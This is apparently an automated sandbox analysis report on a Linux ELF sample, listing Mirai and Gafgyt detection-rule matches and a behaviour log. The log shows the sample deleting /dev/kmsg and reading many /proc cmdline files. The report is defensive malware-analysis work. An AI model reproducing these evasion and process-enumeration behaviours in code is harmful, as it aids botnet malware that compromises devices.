Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6523.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: classification engineClassification label: mal72.evad.linELF@0/3@54/0

Data Obfuscation

barindex
Source: /tmp/i586.elf (PID: 6265)Deleted: /dev/kmsgJump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6295)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6295)Directory: <invalid fd (8)>/..Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6302)Directory: <invalid fd (10)>/..Jump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/910/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1344/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1465/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1586/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1463/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/801/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1900/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/27/cmdlineJump to behavior
